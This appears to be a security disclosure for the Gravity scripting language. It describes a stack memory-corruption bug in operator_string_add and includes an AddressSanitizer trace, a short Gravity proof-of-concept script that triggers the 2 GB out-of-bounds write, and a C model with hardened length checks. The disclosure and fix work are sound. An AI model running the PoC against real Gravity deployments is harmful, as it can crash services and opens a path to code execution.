Gravity is vulnerable to a Stack-Buffer-Overflow in the operator_string_add function. ASAN is saying it is a "buffer-underflow", but by looking at gravity under GDB we can see that we are gaining an arbitrary write. This opens up a security risk as an attacker can use this to write past a static buffer and achieve code execution.
Execution:
./gravity test.gravity
GDB:
ASAN:
==86043==ERROR: AddressSanitizer: stack-buffer-underflow on address 0x7fff5b513380 at pc 0x00010478f89e bp 0x7fff5b5121d0 sp 0x7fff5b511978
WRITE of size 2147483647 at 0x7fff5b513380 thread T0
#0 0x10478f89d in wrap_memcpy (libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x4e89d)
#1 0x10470d06e in operator_string_add (gravity:x86_64+0x10002106e)
#2 0x1047139e5 in gravity_vm_exec (gravity:x86_64+0x1000279e5)
#3 0x104717c68 in gravity_vm_runmain (gravity:x86_64+0x10002bc68)
#4 0x104726499 in main (gravity:x86_64+0x10003a499)
#5 0x7fff9a67f234 in start (libdyld.dylib:x86_64+0x5234)
Address 0x7fff5b513380 is located in stack of thread T0 at offset 0 in frame
#0 0x104725f2f in main (gravity:x86_64+0x100039f2f)
This frame has 3 object(s):
[32, 176) 'delegate' <== Memory access at offset 0 partially underflows this variable
[240, 248) 'size' <== Memory access at offset 0 partially underflows this variable
[272, 784) 'buffer41' <== Memory access at offset 0 partially underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-underflow (libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x4e89d) in wrap_memcpy
Shadow bytes around the buggy address:
0x1fffeb6a2620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1fffeb6a2630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1fffeb6a2640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1fffeb6a2650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1fffeb6a2660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1fffeb6a2670:[f1]f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00
0x1fffeb6a2680: 00 00 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 00 f2
0x1fffeb6a2690: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1fffeb6a26a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1fffeb6a26b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1fffeb6a26c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==86043==ABORTING
Abort trap: 6
POC:
func main () {
    // seed string; appending a number converts it to text ("AAAAAAAAAAAAA1000000")
    var s = "AAAAAAAAAAAAA";
    s = s+1000000
    var ret = ""
    for (var c in s)
    {
        if (c == "A")
        {
            // ret = ret + (ret + c): the length roughly doubles on every pass
            while(true)
            {
                ret += ret+c;
            }
        }
    }
    return ret;
}
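The numbers in the ASAN report are consistent with a 32-bit string length that wraps. Starting from an empty ret, the PoC's ret += ret+c computes ret + (ret + c), so the length after n passes is 2^n - 1; after 31 passes ret is 2147483647 bytes, and on the next pass the outer add sums 2^31 - 1 and 2^31 to 2^32 - 1, a value whose "+ 1" wraps to 0 in 32 bits and therefore passes any check of the form len + 1 < sizeof(buffer). The memcpy of the first operand (2147483647 bytes) then lands in the small stack buffer, which is the WRITE of size 2147483647 in the trace. The C below is an added model of that failure mode written for this page; it is not Gravity's source. The 512-byte stack buffer, the len + 1 < sizeof(buffer) selection check and the function names are assumptions chosen to match the report, and the replay only tracks lengths, not the multi-gigabyte strings the real run would have to allocate.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the on-stack result buffer used for "short" results. */
#define STACK_BUF_SIZE 512u

/* Model of the vulnerable selection check (hypothetical, not Gravity's code):
 * lengths are uint32_t, the sum may wrap, and (len + 1) wraps to 0 when
 * len == UINT32_MAX, so an enormous result "fits" in the stack buffer. */
bool vuln_uses_stack_buffer(uint32_t len1, uint32_t len2)
{
    uint32_t len = len1 + len2;
    return (len + 1) < STACK_BUF_SIZE;
}

/* Hardened check: widen to size_t before adding and refuse any result that
 * would not fit a 32-bit length field together with its terminating NUL. */
bool safe_len_overflows(uint32_t len1, uint32_t len2)
{
    size_t len = (size_t)len1 + (size_t)len2;
    return len > (size_t)UINT32_MAX - 1;
}

bool safe_uses_stack_buffer(uint32_t len1, uint32_t len2)
{
    if (safe_len_overflows(len1, len2)) return false;
    return (size_t)len1 + (size_t)len2 + 1 <= STACK_BUF_SIZE;
}

/* Hardened concatenation: heap copy, NULL on length overflow. Caller frees. */
char *safe_concat(const char *s1, uint32_t len1, const char *s2, uint32_t len2)
{
    if (safe_len_overflows(len1, len2)) return NULL;
    size_t len = (size_t)len1 + (size_t)len2;
    char *out = malloc(len + 1);
    if (!out) return NULL;
    memcpy(out, s1, len1);
    memcpy(out + len1, s2, len2);
    out[len] = '\0';
    return out;
}

/* Replay the PoC's growth pattern ret = ret + (ret + c) with exact 64-bit
 * lengths and return the first pass on which the vulnerable check would
 * route an over-long result into the stack buffer; *copy_len receives the
 * size of the first memcpy that check would allow. Returns 0 if never. */
unsigned first_unsafe_pass(uint64_t *copy_len)
{
    uint64_t len = 0;                      /* ret starts as "" */
    for (unsigned pass = 1; pass <= 64; pass++) {
        uint64_t inner = len + 1;          /* ret + c */
        uint64_t outer = len + inner;      /* ret + (ret + c) */
        uint32_t l1 = (uint32_t)len, l2 = (uint32_t)inner;
        if (vuln_uses_stack_buffer(l1, l2) && outer + 1 > STACK_BUF_SIZE) {
            *copy_len = l1;
            return pass;
        }
        len = outer;
    }
    return 0;
}

/* Convenience wrappers so the results can be checked without locals. */
unsigned poc_pass(void)      { uint64_t n; return first_unsafe_pass(&n); }
uint64_t poc_copy_len(void)  { uint64_t n; first_unsafe_pass(&n); return n; }

/* Constructed sample: the PoC's seed plus the number it appends. */
bool concat_sample_ok(void)
{
    char *r = safe_concat("AAAAAAAAAAAAA", 13, "1000000", 7);
    bool ok = r && strcmp(r, "AAAAAAAAAAAAA1000000") == 0;
    free(r);
    return ok;
}
```

The same wrap also needs the heap path to be right: once a length may reach 2^32 - 1, any allocation of len + 1 computed in 32 bits asks for 0 bytes, so the hardened version widens before adding rather than checking after.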